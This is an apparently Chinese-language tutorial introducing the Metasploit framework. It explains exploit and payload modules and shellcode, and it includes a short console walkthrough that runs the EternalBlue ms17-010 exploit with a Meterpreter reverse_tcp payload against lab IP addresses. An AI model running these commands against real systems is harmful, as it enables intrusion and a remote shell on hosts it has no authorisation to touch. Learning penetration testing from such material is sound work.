文章目录
Metasploit的介绍
- Metasploit的介绍
- MSF中exploit模块
- 漏洞利用exploit
- 攻击载荷(payload)
- Metasploit中的 Payload 模块
- Meterpreter
- 摘抄
- MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新
- Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。
- 刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。
- 在kali中,自带了Metasploit工具。
apt-get install metasploit-framework
进入框架:msfconsole
使用search命令查找相关漏洞: search ms17-010
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue
使用info查看模块信息: info
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数:show options
设置参数:set RHOST 192.168.232.143
set lhost 192.168.232.140
攻击:exploit / run
后渗透
-
也就是我们常说的 exp,他就是对漏洞进行攻击的代码。
-
exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits
-
这里面有针对不同平台的 exploit 。
-
进入 windows 平台,这里会列出针对windows平台不同服务的漏洞利用
-
进入smb服务,这是windows中经常爆出漏洞的服务,比如我们的永恒之蓝漏洞就在这里面。
-
漏洞利用代码是以 rb 结尾的文件,因为metasploit是用Ruby语言编写的。
- payload模块路径:/usr/share/metasploit-framework/modules/payloads
- Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。
- 简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
- Shellcode:Shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。
- Shellcode通常用汇编语言编写。
- 在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。
cd /usr/share/metasploit-framework/modules/payloads
人的一生是万里山河, 来往无数过客。 有人给江河添色, 有人使日月无光, 有人改他江流, 有人塑他梁骨, 大限到时, 不过是立在山巅, 江河回望。 – 《德卡先生的信箱》
